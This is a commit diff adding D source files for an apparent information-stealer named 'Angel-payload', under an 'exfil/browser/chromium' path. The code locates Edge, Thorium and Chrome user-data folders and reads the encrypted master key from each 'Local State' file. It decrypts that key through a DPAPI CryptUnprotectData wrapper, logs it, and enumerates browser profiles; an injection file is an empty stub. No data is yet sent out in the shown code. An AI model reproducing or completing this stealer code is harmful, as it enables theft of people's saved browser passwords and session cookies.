Initiliazation

full/Angel-payload/angel/exfil/browser/chromium/chromium.d

@@ -0,0 +1,77 @@
+module angel.exfil.browser.chromium.chromium;
+
+// Internal imports
+import angel.utils.constants;
+import angel.utils.logging;
+import angel.exfil.browser.chromium.dpapi;
+// External imports
+import std.stdio;
+import std.string;
+import std.file;
+import std.base64;
+import std.Path;
+import std.format;
+import std.json;
+
+class Chromium {
+    private {
+        string localst;
+        string[] profs = ["Default", "Profile 1", "Profile 2", "Profile 3", "Profile 4", "Profile 5"];
+        string[] paths = ["Microsoft\\Edge", "Thorium", "Google\\Chrome"];
+    }
+
+    public void entry() {
+        Logger.log(LogLevel.Debug, "Entered chromium");
+
+        foreach (path; paths) {
+            string pat = buildPath(Constants.local_appdata, path, "User Data");
+
+            if (exists(pat)) {
+                Logger.log(LogLevel.Debug, format("Browser dir %s exists", pat));
+
+                this.localst = buildPath(pat, "Local State");
+
+                if (exists(localst)) {
+                    Logger.log(LogLevel.Debug, format("Local State file %s exists for browser %s", localst, pat));
+
+                    ubyte[] master_key = this.mkey();
+
+                    if (master_key is null || master_key.length == 0) {
+                        Logger.log(
+                            LogLevel.Debug,
+                            "Master key contains 0 bytes, possible uncaught/unknown error. Skipping..."
+                        );
+                        Logger.log(LogLevel.Debug, format("%s", master_key));
+                        return;
+                    } else {
+                        Logger.log(LogLevel.Debug, format("Decrypted master key: %s", master_key));
+                    }
+
+                    foreach(prof; profs) {
+                        string profpat = buildPath(pat, prof);
+
+                        if (exists(profpat)) {
+                            Logger.log(LogLevel.Debug, format("Profile %s exists for browser %s", prof, pat));
+                        }
+                    }
+                }
+            }
+        }
+    }
+
+    private ubyte[] mkey() {
+        string bjson = readText(this.localst);
+
+        JSONValue json = parseJSON(bjson);
+
+        string encoded = json["os_crypt"]["encrypted_key"].str;
+
+        ubyte[] bdecoded = Base64.decode(encoded.strip());
+
+        ubyte[] bkey_crypt = bdecoded[5 .. $];
+
+        ubyte[] dat = dpapi(bkey_crypt);
+
+        return dat;
+    }
+}

full/Angel-payload/angel/exfil/browser/chromium/dpapi.d

@@ -0,0 +1,46 @@
+module angel.exfil.browser.chromium.dpapi;
+
+// Internal imports
+import angel.utils.logging;
+// External imports
+import core.sys.windows.windows;
+import core.stdc.stdlib;
+import std.string;
+
+extern(Windows) 
+{
+    BOOL CryptUnprotectData(
+        const(DATA_BLOB)* pDataIn,
+        LPCWSTR* ppszDataDescr,
+        const(DATA_BLOB)* pOptionalEntropy,
+        void* pvReserved,
+        void* pPromptStruct,
+        uint dwFlags,
+        DATA_BLOB* pDataOut
+    );
+}
+
+extern(Windows)
+struct DATA_BLOB
+{
+    uint cbData;
+    ubyte* pbData;
+}
+
+ubyte[] dpapi(ubyte[] key_crypt) {
+    DATA_BLOB inBlob;
+    DATA_BLOB outBlob;
+
+    inBlob.pbData = key_crypt.ptr;
+    inBlob.cbData = cast(uint) key_crypt.length;
+
+    if (CryptUnprotectData(&inBlob, null, null, null, null, 0, &outBlob)) {
+        ubyte[] decrypted = cast(ubyte[])(outBlob.pbData[0 .. outBlob.cbData]).idup;
+            
+        free(outBlob.pbData);
+
+        return decrypted;
+    } else {
+        return [];
+    }
+}

full/Angel-payload/angel/exfil/browser/chromium/inject.d

@@ -0,0 +1,2 @@
+module angel.exfil.browser.chromium.inject;
+